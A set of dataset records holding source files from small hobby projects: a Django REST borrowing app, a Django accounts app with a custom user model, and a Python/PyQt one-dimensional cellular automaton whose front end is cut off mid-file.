"blob_id": "a089ebd3c2d50909fcb65cb243bcdbdc6642e3f3",
"content_id": "e7372ab73d1c310b421fec5d623ceb99b8cbf659",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 674,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 20,
"path": "/django_server/test_meme/borrowing/models.py",
"repo_name": "porrametict/django_and_vuejs",
"src_encoding": "UTF-8",
"text": "from django.db import models\nfrom django.contrib.auth.models import User\n\n\n# Create your models here.\nclass Product(models.Model):\n name = models.CharField(max_length=50)\n volume = models.IntegerField()\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n\n def __str__(self):\n return \"{}\".format(self.name)\n\n\nclass Borrowing(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n product = models.ForeignKey(Product, on_delete=models.CASCADE)\n created_at = models.DateTimeField(auto_now_add=True, null=True)\n updated_at = models.DateTimeField(auto_now=True, null=True)\n"
},
{
"alpha_fraction": 0.6931216716766357,
"alphanum_fraction": 0.6931216716766357,
"avg_line_length": 24.727272033691406,
"blob_id": "3f43a3da7d3e7d54c775e01d29a796dd59d03a38",
"content_id": "6751ba2e19454b4584259ca7a8cc6c9a803dc0eb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 567,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 22,
"path": "/django_server/test_meme/borrowing/serializer.py",
"repo_name": "porrametict/django_and_vuejs",
"src_encoding": "UTF-8",
"text": "from django.contrib.auth.models import User\nfrom rest_framework import serializers\nfrom .models import Borrowing, Product\n\n\n# Serializers define the API representation.\nclass UserSerializer(serializers.ModelSerializer):\n class Meta:\n model = User\n fields = ['id', 'username', 'email', 'is_staff']\n\n\nclass ProductSerializers(serializers.ModelSerializer):\n class Meta:\n model = Product\n fields = '__all__'\n\n\nclass BorrowingSerializers(serializers.ModelSerializer):\n class Meta:\n model = Borrowing\n fields = '__all__'\n\n"
},
{
"alpha_fraction": 0.7836257219314575,
"alphanum_fraction": 0.7836257219314575,
"avg_line_length": 27.5,
"blob_id": "e9572890f6be59022e0407e908e2d27eebe5e793",
"content_id": "1eba629e7ae412b8e190af061e95b79852479be5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 342,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 12,
"path": "/django_server/test_meme/borrowing/urls.py",
"repo_name": "porrametict/django_and_vuejs",
"src_encoding": "UTF-8",
"text": "from django.urls import path, include\nfrom rest_framework.routers import DefaultRouter\nfrom borrowing import views\n\nrouter = DefaultRouter()\nrouter.register(r'product', views.ProductViewSet)\nrouter.register(r'users', views.UserViewSet)\nrouter.register(r'borrow', views.BorrowingViewSet)\n\nurlpatterns = [\n path('', include(router.urls)),\n]\n"
},
{
"alpha_fraction": 0.5418118238449097,
"alphanum_fraction": 0.5749129056930542,
"avg_line_length": 23.95652198791504,
"blob_id": "e2a9082da9e571cb8749e9dc3ad2034b6d8a0938",
"content_id": "6e861a8b3d93196aecb3efae0c63bd018863bdf7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 574,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 23,
"path": "/django_server/test_meme/borrowing/migrations/0002_auto_20200227_1905.py",
"repo_name": "porrametict/django_and_vuejs",
"src_encoding": "UTF-8",
"text": "# Generated by Django 2.2.8 on 2020-02-27 12:05\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('borrowing', '0001_initial'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='borrowing',\n name='created_at',\n field=models.DateTimeField(auto_now_add=True, null=True),\n ),\n migrations.AddField(\n model_name='borrowing',\n name='updated_at',\n field=models.DateTimeField(auto_now=True, null=True),\n ),\n ]\n"
},
{
"alpha_fraction": 0.7160603404045105,
"alphanum_fraction": 0.7160603404045105,
"avg_line_length": 30.30555534362793,
"blob_id": "1a9195bcaf0f855503cbb409ad1133a768bc0c7c",
"content_id": "7697257c73d15e4f43930cd05d6dcd23deb9a7cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1127,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 36,
"path": "/django_server/test_meme/borrowing/views.py",
"repo_name": "porrametict/django_and_vuejs",
"src_encoding": "UTF-8",
"text": "from django.contrib.auth.models import User\nfrom django.shortcuts import render\nfrom rest_framework.response import Response\n\nfrom .serializer import ProductSerializers, UserSerializer, BorrowingSerializers\nfrom .models import Product, Borrowing\nfrom rest_framework import viewsets\n\n\n# Create your views here.\n\nclass ProductViewSet(viewsets.ModelViewSet):\n queryset = Product.objects.all()\n serializer_class = ProductSerializers\n\n\n# ViewSets define the view behavior.\nclass UserViewSet(viewsets.ModelViewSet):\n queryset = User.objects.all()\n serializer_class = UserSerializer\n\n \nclass BorrowingViewSet(viewsets.ModelViewSet):\n queryset = Borrowing.objects.all()\n serializer_class = BorrowingSerializers\n\n def list(self, request):\n b = Borrowing.objects.all()\n b_data = BorrowingSerializers(b, many=True).data\n for i in range(len(b_data)):\n user_data = UserSerializer(b[i].user).data\n b_data[i]['user'] = user_data\n product_data = ProductSerializers(b[i].product).data\n b_data[i]['product'] = product_data\n\n return Response(b_data)\n"
}
] | 6 |
ohwani/molla | https://github.com/ohwani/molla | ee97283060f221141877f56b1fd31556a8a41329 | 622fb3d72f4830eb69362013d3ed1b3c911efc3f | 377ed1a7b5fe613c9cb13fbb19a37cfc4081be42 | refs/heads/main | 2023-03-25T03:27:54.693675 | 2021-03-25T14:32:16 | 2021-03-25T14:32:16 | 347,636,284 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6989924311637878,
"alphanum_fraction": 0.7141057848930359,
"avg_line_length": 28.44444465637207,
"blob_id": "6107566ca105a218d1994978e8f43443fcf5ea60",
"content_id": "ad7439facbd35a05c1aa39391046dc491ccb90d6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 794,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 27,
"path": "/accounts/models.py",
"repo_name": "ohwani/molla",
"src_encoding": "UTF-8",
"text": "from django.db import models\nfrom django.contrib.auth.models import AbstractUser\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom .managers import CustomUserManager\n\n\nclass User(AbstractUser):\n username = None\n last_name = None\n first_name = None\n email = models.EmailField(unique=True)\n password = models.CharField(max_length=128)\n\n USERNAME_FIELD = 'email'\n REQUIRED_FIELDS = []\n\n objects = CustomUserManager()\n\n name = models.CharField(blank=True, max_length=100)\n address = models.CharField(blank=True, max_length=200)\n phone = models.CharField(blank=True, max_length=100)\n date_of_birth = models.DateField(blank=True, null=True)\n profile_image = models.ImageField(blank=True, null= True)\n\n def __str__(self):\n return self.email"
},
{
"alpha_fraction": 0.8217054009437561,
"alphanum_fraction": 0.8217054009437561,
"avg_line_length": 31.25,
"blob_id": "e0e119ac9bf1de330c737708395d3c52fe866ce0",
"content_id": "c3d7d2bd131d890821c863efbc29dbd70e2ab9b2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 129,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 4,
"path": "/post/views.py",
"repo_name": "ohwani/molla",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\n\n# Create your views here.\n# from rest_framework.gnerics import ListAPIview, RetrieveAPIView "
},
{
"alpha_fraction": 0.40789473056793213,
"alphanum_fraction": 0.4736842215061188,
"avg_line_length": 24.33333396911621,
"blob_id": "1a9a9a121f79274f6987d75f8354ec0a78f4f915",
"content_id": "e6061703bc4f2ba34696532d1fa563a78987fb5f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 152,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 6,
"path": "/accounts/regex.py",
"repo_name": "ohwani/molla",
"src_encoding": "UTF-8",
"text": "EMAIL_RegEx = r'/^[0-9a-zA-Z]([-_.]?[0-9a-zA-Z])*@[0-9a-zA-Z]([-_.]?[0-9a-zA-Z])*.[a-zA-Z]{2,3}$/i'\n\n\nMessage = {\n 'email': 'INVALID EMAIL FORMAT'\n}\n"
},
{
"alpha_fraction": 0.6714116334915161,
"alphanum_fraction": 0.6714116334915161,
"avg_line_length": 37.318180084228516,
"blob_id": "4540bd73594100d7cc9cf93fe2fbb5bb04a91edc",
"content_id": "cd0d7bf2d9aed9c37587a445a9c1cd11047cf0cf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1686,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 44,
"path": "/accounts/urls.py",
"repo_name": "ohwani/molla",
"src_encoding": "UTF-8",
"text": "from django.urls import path, include\n# from rest_framework_simplejwt import views as jwt_views\nfrom . import views\n# from files.api.views import ProfileList\nfrom rest_framework.routers import DefaultRouter\n# from rest_framework_simplejwt.views import (\n# TokenObtainPairView,\n# TokenRefreshView, \n# TokenVerifyView\n# )\nrouter = DefaultRouter()\nrouter.register('', views.UserViewSet)\n# router.register('login', views.)\n\n\nurlpatterns = [\n path('', include(router.urls)),\n # path('gettoken/', TokenObtainPairView.as_view(), name='token_obtain_pair'),\n # path('refreshtoken/', TokenRefreshView.as_view(), name='token_refresh'),\n # path('verifytoken/', TokenVerifyView.as_view(), name='token_verify'),\n # path('user/', views.UserViewSet.as_view(), name='signup'),\n \n\n # path('', views.accountsOverview, name=\"account-overview\"),\n # path('user-list/', views.userList, name=\"user-list\"),\n # path('user-list/<int:pk>/', views.userDetail, name=\"user-detail\"),\n # path('user-create/', views.userCreate, name=\"user-create\"),\n # path('user-update/<int:pk>/', views.userUpdate, name=\"user-update\"),\n # path('user-delete/<int:pk>/', views.userDelete, name=\"user-delete\"),\n # path('userdetail/<int:pk>/', views.userDetail, name=\"user-Detail\"),\n # path('userlist/', views.userDetail, name=\"user-Detail\"),\n # path('user/', views.UserListMixins.as_view()),\n # path('userdetail/<int:pk>/', views.UserDetailMixins.as_view()),\n]\n\n\n# from django.urls import path, include\n# from . import views\n\n# urlpatterns = [\n# # FBV\n# path('user/', views.UserListAPIView.as_view()),\n# path('user/<int:pk>/',views.UserDetailAPIView.as_view()),\n# ]\n"
},
{
"alpha_fraction": 0.5231788158416748,
"alphanum_fraction": 0.7284768223762512,
"avg_line_length": 17.875,
"blob_id": "aec13484fe045ab9dbf058b3c383430cecb8b778",
"content_id": "4ecce6c89281d3583ae630870268a3a577f2d8a1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 151,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 8,
"path": "/requirements.txt",
"repo_name": "ohwani/molla",
"src_encoding": "UTF-8",
"text": "asgiref==3.3.1\ncertifi==2020.12.5\nDjango==3.1.6\ndjango-cors-headers==3.7.0\ndjangorestframework==3.12.2\nmysqlclient==2.0.3\npytz==2021.1\nsqlparse==0.4.1\n"
},
{
"alpha_fraction": 0.6388888955116272,
"alphanum_fraction": 0.6410256624221802,
"avg_line_length": 29.5,
"blob_id": "c81fabceaca6cd09a05cc98b327e2d982dacc91b",
"content_id": "8780bfe555e0f001398a8328585a999afe7b4744",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1414,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 46,
"path": "/accounts/views.py",
"repo_name": "ohwani/molla",
"src_encoding": "UTF-8",
"text": "# from rest_framework import status\n# from rest_framework.views import APIView\n# from rest_framework.response import Response\nfrom rest_framework import viewsets\nfrom rest_framework.permissions import AllowAny\nfrom rest_framework import viewsets, permissions, authentication\n# from rest_framework.permissions import AllowAny, IsAuthenticated\n\nfrom .serializers import (\n UserSerializer,\n)\n\nfrom .models import User\n\n# class UserRegisterationView(APIView):\n# serializer_class = UserRegisterSerializer\n# # permission_classes = (AllowAny)\n\n# def post(self, request):\n# serializer = self.serializer_class(data=request.data)\n# vaild = serializer.is_valid(rasie_exception=True)\n\n# if valid:\n# serializer.save()\n# status_code = status.HTTP_201_CREATED\n\n# response = {\n# 'success': True,\n# 'statusCode': status_code,\n# 'message': 'User successfully registered!',\n# 'user': serializer.data\n# }\n\n# return Response(response, status=status_code)\n\nclass UserViewSet(viewsets.ModelViewSet):\n queryset = User.objects.all()\n serializer_class = UserSerializer\n permissions_classes = [AllowAny]\n\n # @action(detail=False)\n # def create(self, request, *args, **kwargs):\n # '''\n # 사용자 등록\n # '''\n # data = request.data\n\n"
},
{
"alpha_fraction": 0.6713147163391113,
"alphanum_fraction": 0.6772908568382263,
"avg_line_length": 34.92856979370117,
"blob_id": "f609d34acd43ddd5ecb3aa3319ad3f0ce41c7db5",
"content_id": "e9510eec3711c9d01ede39cc02cd9503887545c7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 502,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 14,
"path": "/post/models.py",
"repo_name": "ohwani/molla",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\n# Create your models here.\n# class Post(models.Model):\n# user = models.ForeignKey(settings.AUTH_USER_MODEL)\n# title = models.CharField(max_length=120)\n# slug = models.SlugField(unique=True)\n# image = models.ImageField()\n# content = models.TextField()\n# create_at = models.DateTimeField(auto_now=True, auto_now_add=False)\n# update_at = models.DateTimeField(auto_now=True, auto_now_add=False)\n\n# def __str__(self):\n# return self.title"
},
{
"alpha_fraction": 0.5668638944625854,
"alphanum_fraction": 0.5684418082237244,
"avg_line_length": 30.662500381469727,
"blob_id": "1d13fa8ee1bc429ff6e7a825b582a64d216a71d4",
"content_id": "2f2f823176f98f0c6cf058a761d7c842fbbd898d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2535,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 80,
"path": "/accounts/serializers.py",
"repo_name": "ohwani/molla",
"src_encoding": "UTF-8",
"text": "# from django.contrib.auth import authenticate\n\nfrom rest_framework import serializers\nfrom rest_framework.validators import UniqueTogetherValidator\n# from rest_framework_simplejwt.serializers import TokenObtainSerializer\n# from rest_framework_simplejwt.tokens import RefreshToken\n\nfrom .models import User\nimport re\n\n\nclass UserSerializer(serializers.ModelSerializer):\n \n class Meta:\n model = User\n fields = '__all__'\n extra_kwargs = {\n 'password' : {'write_only': True}\n }\n\n validators = [\n UniqueTogetherValidator(\n queryset = User.objects.all(),\n fields = ['email'],\n message = 'This email already exists'\n )\n ]\n def validate(self, attrs):\n check_password = re.compile('^(?=.*[A-Za-z])(?=.*\\d)(?=.*[$@$!%*#?&])[A-Za-z\\d$@$!%*#?&]{8,}$')\n email = attrs.get('email', None) \n password = attrs.get('password', None)\n password2 = attrs.get('password2', None)\n\n if not re.match(check_password, attrs['password']):\n raise serializers.ValidationError({'password': 'Please check your password.'})\n\n if password != password2:\n raise serializers.ValidationError({'password': 'Passwords must match.'})\n \n return attrs\n\n\n# class LoginSerializer(serializers.Serializer):\n\n# class Meta:\n# model = User\n# fields = ['emali', 'passowrd']\n \n# def validate(self, attrs):\n# email = attrs.get('email', None) \n# password = attrs.get('password', None)\n# user = authenticate(email=email, password=password)\n\n# if user is None:\n# raise serializers.ValidationError(\"Invalid login credentials\")\n# try:\n# refresh = RefreshToken.for_user(user)\n# refresh_token = str(refresh)\n# access_token = str(refresh.access_token)\n\n# update_last_login(None, user)\n\n# validation = {\n# 'access': access_token,\n# 'refresh': refresh_token,\n# 'email': user.email,\n# 'role': user.role,\n# }\n\n# return validation\n \n# except AuthUser.DoesNotExist:\n# raise serializers.ValidationError(\"Invalid login credentials\")\n\n \n # def validate_email(self, attrs):\n # email = User.objects.filter(email=attrs)\n # if email.exists():\n # raise serializers.ValidationError('This email already exists')\n # return attrs\n\n\n"
}
] | 8 |
McKay1717/Jeux-de-la-vie | https://github.com/McKay1717/Jeux-de-la-vie | 5344950da4b2555a31fe5262fa4172fac014b5f8 | fda8193e094e223f358647cc059d9c9ae4a96f6b | c24cd116aecccfbb02eb4e50dfc5db47ff89df62 | refs/heads/master | 2020-05-30T22:49:59.676357 | 2019-07-02T10:00:12 | 2019-07-02T10:00:12 | 190,001,420 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.53629469871521,
"alphanum_fraction": 0.539544939994812,
"avg_line_length": 28.30158805847168,
"blob_id": "691fc91a88e4739e982057d9b0db79080dbed373",
"content_id": "906c4eeb9f1c3f2cb0f6479f2cf46e1657dc578e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1846,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 63,
"path": "/Backend/backend.py",
"repo_name": "McKay1717/Jeux-de-la-vie",
"src_encoding": "UTF-8",
"text": "from Backend.CellArray import CellArray\nfrom Backend.rule import Rule\nfrom Backend.rulesCollection import RulesCollection\n\nclass Backend:\n def __init__(self, rules, cell_tabs):\n self.__cell_tabs = None\n self.rules = None\n try:\n self.__cell_tabs = cell_tabs\n self.__rules = rules\n except Exception as e:\n raise e\n\n def getCellArray(self):\n return self.__cell_tabs\n\n def getRules(self):\n return self.__rules\n\n def setRules(self, rules_dict):\n if not isinstance(rules_dict, RulesCollection):\n raise TypeError('Expeting a RuleCollection')\n self.__rules = rules_dict\n\n def setCellArray(self, cell_array):\n if not isinstance(cell_array, CellArray):\n raise TypeError('Expeting a CellArray')\n self.__cell_tabs = cell_array\n\n def __generateLineFromRules(self, lastLine):\n newLine =[]\n for i in range(0, len(lastLine)):\n if i != 0:\n a = lastLine[i-1]\n else:\n a = True\n\n b = lastLine[i]\n\n if i != (len(lastLine)-1):\n c = lastLine[i+1]\n else:\n c = True\n try:\n rule = Rule(False,int(a),int(b),int(c))\n except Exception as e:\n raise e\n return\n newLine.append(self.__rules.getRulesDictionnary()[rule])\n for i in range(0, len(newLine)):\n self.__cell_tabs.SetCell(self.__cell_tabs.GetCurrentIterID(), i, newLine[i])\n\n\n def tick(self):\n lastline = []\n for item in self.__cell_tabs:\n lastline.append(item)\n self.__cell_tabs.StartNextIteration()\n try:\n self.__generateLineFromRules(lastline)\n except Exception as e:\n raise e\n"
},
{
"alpha_fraction": 0.4885764420032501,
"alphanum_fraction": 0.514938473701477,
"avg_line_length": 25.6875,
"blob_id": "4a161743c7fbae4a39867a3ddf96b58b3b6ddbb4",
"content_id": "93d5d98a93da76c27dd37c0dbf958f87580c048a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1707,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 64,
"path": "/Backend/rule.py",
"repo_name": "McKay1717/Jeux-de-la-vie",
"src_encoding": "UTF-8",
"text": "import hashlib\nimport binascii\nclass Rule:\n # -1 unknown 0 black 1 white\n def __init__(self, rule_type, b1, b2, b3):\n self.__rule = [False, -1, -1, -1]\n try:\n self.SetRuleType(rule_type)\n self.__SetB1(b1)\n self.__SetB2(b2)\n self.__SetB3(b3)\n except Exception as e:\n raise e\n\n def SetRuleType(self, inputType):\n if type(inputType) is not bool:\n raise TypeError('Only Boolean is allowed')\n else:\n self.__rule[0] = type\n\n def GetRuleType(self):\n return self.__rule[0]\n\n def __SetColor(self, color, pos):\n if not isinstance(color, int):\n raise TypeError('Only Int is allowed')\n elif color not in [0, 1, -1]:\n raise ValueError('Only 0, 1 or -1 is allowed')\n else:\n self.__rule[pos] = color\n\n def __SetB1(self, color):\n try:\n self.__SetColor(color, 1)\n except Exception as e:\n raise e\n\n def __SetB2(self, color):\n try:\n self.__SetColor(color, 2)\n except Exception as e:\n raise e\n\n def __SetB3(self, color):\n try:\n self.__SetColor(color, 3)\n except Exception as e:\n raise e\n\n def GetB1(self):\n return self.__rule[1]\n\n def GetB2(self):\n return self.__rule[2]\n\n def GetB3(self):\n return self.__rule[3]\n\n def __eq__(self, other):\n return (self.GetB1() == other.GetB1()) and (self.GetB2() == other.GetB2()) and (self.GetB3() == other.GetB3())\n\n def __hash__(self):\n s = str(int(self.GetB1()))+str(int(self.GetB2()))+str(int(self.GetB3()))\n return int(s, 2)"
},
{
"alpha_fraction": 0.6540284156799316,
"alphanum_fraction": 0.6540284156799316,
"avg_line_length": 37.227272033691406,
"blob_id": "a79c0af08b609202e8f373efd7ff74a19815a5fd",
"content_id": "ee97aadc1a359af189db469c05d12d2f79a1505c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 844,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 22,
"path": "/Backend/rulesCollection.py",
"repo_name": "McKay1717/Jeux-de-la-vie",
"src_encoding": "UTF-8",
"text": "from Backend.rule import Rule\n\nclass RulesCollection:\n def __init__(self, rulesDictionnaryInput):\n self.__rulesDictionnary = None\n try:\n self.setRulesDictionnary(rulesDictionnaryInput)\n except Exception as e:\n raise e\n\n def setRulesDictionnary(self, rulesDictionnaryInput):\n if type(rulesDictionnaryInput) is not dict:\n raise TypeError('Only Dictionnary is allowed')\n for key in rulesDictionnaryInput:\n if type(key) is not Rule:\n raise TypeError('Only Rule object is allowed as key')\n if type(rulesDictionnaryInput[key]) is not bool:\n raise TypeError('Only bool is allowed as value')\n self.__rulesDictionnary = rulesDictionnaryInput\n\n def getRulesDictionnary(self):\n return self.__rulesDictionnary\n\n\n\n"
},
{
"alpha_fraction": 0.5523999929428101,
"alphanum_fraction": 0.5559999942779541,
"avg_line_length": 28.069766998291016,
"blob_id": "9f9639f2bf40521be2f78416a37515f8eb6f05cb",
"content_id": "41a8f3951a41f4c18feb3403b7e8de2f73ae657e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2500,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 86,
"path": "/Backend/CellArray.py",
"repo_name": "McKay1717/Jeux-de-la-vie",
"src_encoding": "UTF-8",
"text": "from random import randint\n\nclass CellArray:\n def __init__(self, row_size):\n # Main array of cell, true = white, false=black\n self.__cell_array = []\n self.__row_size = row_size\n self._cursor = 0\n try:\n self.__InitArray(row_size)\n except Exception as v:\n raise v\n\n # Fill line with True and add it to main array\n def StartNextIteration(self):\n self.__cell_array.append(self.__InitLine())\n\n # Get size of line\n def GetRowSize(self):\n return self.__row_size\n\n # Return the ID of current iteration\n def GetCurrentIterID(self):\n return len(self.__cell_array)-1\n\n # Fill a line with True and return it\n def __InitLine(self):\n y_array = []\n for x in range(0, self.GetRowSize()):\n y_array.append(True)\n return y_array\n\n # Check if input is good and init the first line with a black pixel\n def __InitArray(self, row_size):\n if type(row_size) is not int:\n raise TypeError(str(row_size) + 'is not a integer')\n # Init whole tab to white\n y_array = self.__InitLine()\n self.__cell_array.append(y_array)\n self.__cell_array[0][randint(0, row_size - 1)] = False\n\n # Return the boolean for the iterd_id at the postion y\n def GetCell(self, iterd_id, y):\n try:\n current_cell = self.__cell_array[iterd_id][y]\n except Exception as e:\n raise e\n return current_cell\n\n # Get the position of the cursor\n def GetCursor(self):\n if self.iterate:\n return self.__x\n else:\n raise Exception(\"not currently iterate\")\n\n # Set the boolean for the iterd_id at the postion y\n def SetCell(self, x, y, state):\n if type(state) != bool:\n raise TypeError('Je veux un boolean putain !')\n try:\n self.__cell_array[x][y] = state\n except Exception as e:\n raise e\n\n # Iterate over the line of the current iteration\n def __iter__(self):\n self.__x = self.GetCurrentIterID()\n self.__y = 0\n self.iterate = True\n return self\n\n def next(self):\n return self.__next__()\n\n def __next__(self):\n row_size = self.GetRowSize() - 1\n\n cell = self.GetCell(self.__x, self.__y)\n if self.__y == row_size:\n raise StopIteration\n self.iterate = False\n return cell\n else:\n self.__y += 1\n return cell\n"
},
{
"alpha_fraction": 0.5856966972351074,
"alphanum_fraction": 0.6461158990859985,
"avg_line_length": 26.066667556762695,
"blob_id": "9d5d0f83aadd21b7cba7ddd80bd78d0e97db06a9",
"content_id": "53f18e64c48c5411e43236e4758ae43d301e1a6a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 811,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 30,
"path": "/Backend/main.py",
"repo_name": "McKay1717/Jeux-de-la-vie",
"src_encoding": "UTF-8",
"text": "from Backend.backend import Backend\nfrom Backend.CellArray import CellArray\nfrom Backend.rule import Rule\nfrom Backend.rulesCollection import RulesCollection\n\ncells = CellArray(50)\nrule1 = Rule(False, 0, 0, 0)\nrule2 = Rule(False, 0, 0, 1)\nrule3 = Rule(False, 0, 1, 0)\nrule4 = Rule(False, 0, 1, 1)\nrule5 = Rule(False, 1, 0, 0)\nrule6 = Rule(False, 1, 0, 1)\nrule7 = Rule(False, 1, 1, 0)\nrule8 = Rule(False, 1, 1, 1)\n\nrules = {rule1: True, rule2: False, rule3: True, rule4: False, rule5: False, rule6: True, rule7: False, rule8: True}\nrules = RulesCollection(rules)\n\nengine = Backend(rules, cells)\n\nfor i in range(0, 100):\n line = []\n cells = engine.getCellArray()\n for e in cells:\n if e:\n line.append(' ')\n else:\n line.append(chr(219))\n print(line)\n engine.tick()"
},
{
"alpha_fraction": 0.6470588445663452,
"alphanum_fraction": 0.6470588445663452,
"avg_line_length": 16,
"blob_id": "dcf3547ddabc2f524192554a35fee5d56487e08d",
"content_id": "9a37310d45ba0d8647af91d69032dfe67f2898a6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 17,
"license_type": "no_license",
"max_line_length": 16,
"num_lines": 1,
"path": "/README.md",
"repo_name": "McKay1717/Jeux-de-la-vie",
"src_encoding": "UTF-8",
"text": "# Jeux-de-la-vie\n"
},
{
"alpha_fraction": 0.5920660495758057,
"alphanum_fraction": 0.6128560900688171,
"avg_line_length": 37.3556022644043,
"blob_id": "8b5dc1245a1023f6bc1134993820c832871eef0d",
"content_id": "9b8409600090ffd96325d0fbf93717a0e4fed915",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 17823,
"license_type": "no_license",
"max_line_length": 138,
"num_lines": 464,
"path": "/Front/__init__.py",
"repo_name": "McKay1717/Jeux-de-la-vie",
"src_encoding": "UTF-8",
"text": "import time\n\nfrom PyQt5 import uic, QtWidgets, QtCore, Qt\n\nimport sys\n\nfrom PyQt5.QtGui import QPixmap, QImage, QBrush\n\nfrom PyQt5.QtWidgets import QFileDialog\n\nfrom Backend.CellArray import CellArray\nfrom Backend.backend import Backend\nfrom Backend.rule import Rule\nfrom Backend.rulesCollection import RulesCollection\n\nRow = 0\nline = 0\ncolumn = 2\n\ncurrent_exec = -1\ntStart = 0\nisExec = False\nisTime = False\n\n\nclass Ui(QtWidgets.QMainWindow):\n def __init__(self):\n super(Ui, self).__init__()\n uic.loadUi('../Interface/lp74.ui', self)\n self.show()\n\n btn_pause = self.findChild(QtWidgets.QPushButton, \"btn_pause\")\n btn_screen = self.findChild(QtWidgets.QPushButton, \"btn_screen\")\n graphic = self.findChild(QtWidgets.QGraphicsView, \"graphic\")\n\n\n btn_screen.setEnabled(False)\n btn_pause.setEnabled(False)\n\n scene = QtWidgets.QGraphicsScene()\n img = QImage(10, 10, QImage.Format_Mono)\n for i in range(img.height()):\n for j in range(img.height()):\n img.setPixel(i, j, 1)\n pixmap = QPixmap(img)\n pixmap_scaled = pixmap.scaled(graphic.width() - 5, graphic.height() - 5, QtCore.Qt.IgnoreAspectRatio)\n cont = QtWidgets.QLabel()\n cont.setScaledContents(1)\n cont.setPixmap(pixmap_scaled)\n scene.addWidget(cont)\n graphic.setScene(scene)\n\n rules = self.findChild(QtWidgets.QGraphicsView, \"regle\")\n img_rules = QPixmap(\"../Interface/regle254_600.png\")\n img_scaled = img_rules.scaled(rules.width() - 3, rules.height() - 3, QtCore.Qt.IgnoreAspectRatio)\n container = QtWidgets.QLabel()\n container.setScaledContents(1)\n container.setPixmap(img_scaled)\n rule_scene = QtWidgets.QGraphicsScene()\n rule_scene.addWidget(container)\n rules.setScene(rule_scene)\n\n check1 = self.findChild(QtWidgets.QCheckBox, \"check1\")\n check2 = self.findChild(QtWidgets.QCheckBox, \"check2\")\n check3 = self.findChild(QtWidgets.QCheckBox, \"check3\")\n check4 = self.findChild(QtWidgets.QCheckBox, \"check4\")\n check5 = self.findChild(QtWidgets.QCheckBox, \"check5\")\n check6 = self.findChild(QtWidgets.QCheckBox, \"check6\")\n check7 = self.findChild(QtWidgets.QCheckBox, \"check7\")\n check8 = self.findChild(QtWidgets.QCheckBox, \"check8\")\n check1.stateChanged.connect(lambda: state(1, self))\n check2.stateChanged.connect(lambda: state(2, self))\n check3.stateChanged.connect(lambda: state(3, self))\n check4.stateChanged.connect(lambda: state(4, self))\n check5.stateChanged.connect(lambda: state(5, self))\n check6.stateChanged.connect(lambda: state(6, self))\n check7.stateChanged.connect(lambda: state(7, self))\n check8.stateChanged.connect(lambda: state(8, self))\n\n cbb_regle = self.findChild(QtWidgets.QComboBox, \"cbb_regle\")\n f = open(\"../Interface/regles.txt\", \"r\")\n for x in f.readlines():\n splited = x.split(\";\")\n cbb_regle.addItem(splited[0], splited[1])\n dic = eval(cbb_regle.currentData())\n\n if dic['111'] == 1:\n check1.setStyleSheet(\"QCheckBox::indicator {background-color: black}\")\n check1.setCheckState(2)\n if dic['110'] == 1:\n check2.setStyleSheet(\"QCheckBox::indicator {background-color: black}\")\n check2.setCheckState(2)\n if dic['101'] == 1:\n check3.setStyleSheet(\"QCheckBox::indicator {background-color: black}\")\n check3.setCheckState(2)\n if dic['100'] == 1:\n 